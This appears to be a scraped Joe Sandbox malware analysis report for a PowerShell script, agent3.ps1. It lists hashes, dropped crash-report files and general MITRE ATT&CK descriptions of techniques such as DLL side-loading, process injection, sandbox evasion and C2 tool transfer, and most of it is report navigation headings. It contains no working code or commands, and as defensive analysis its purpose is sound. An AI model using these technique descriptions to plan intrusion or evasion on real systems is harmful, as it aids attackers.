Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: f0ecea625c172ba4753a472a5d2e89793934ca17f62285cdd97ff965f37b63a1
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: C001677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3691DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFB4AF385F2 Relevance: 6.4, Strings: 5, Instructions: 107COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFB4AF38612
N_^, xrefs: 00007FFB4AF385F2
N_^, xrefs: 00007FFB4AF3867A
N_^, xrefs: 00007FFB4AF3866A
N_^, xrefs: 00007FFB4AF386C9

Memory Dump Source

Source File: 00000000.00000002.1596356894.00007FFB4AF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af30000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: 87bf796e9329b0811b9e93c46763d2cf94d3fa0197556df55514279286e7adae
Instruction ID: 99abfad2e551049dc2d2f008b01229eca4bd3953ac06966f89a45cdac2a21f2f
Opcode Fuzzy Hash: 87bf796e9329b0811b9e93c46763d2cf94d3fa0197556df55514279286e7adae
Instruction Fuzzy Hash: 063197E3C0EAD10BE3126F3A9C991D56F94EF21258B5901FAC1D9870C3FD1E280B4392

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report agent3.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_b7ebf8a6091e827771f22077431b1f1d7c4ef0_e3b0f337_de2a3942-9071-42b4-bf79-d12858dc0f1c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF78C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB37.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB86.tmp.xml

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq1rp4hg.vx1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlsneqf2.bx2.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OZI6PZA1BDWJ73EK5RHZ.temp

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
agent3.ps1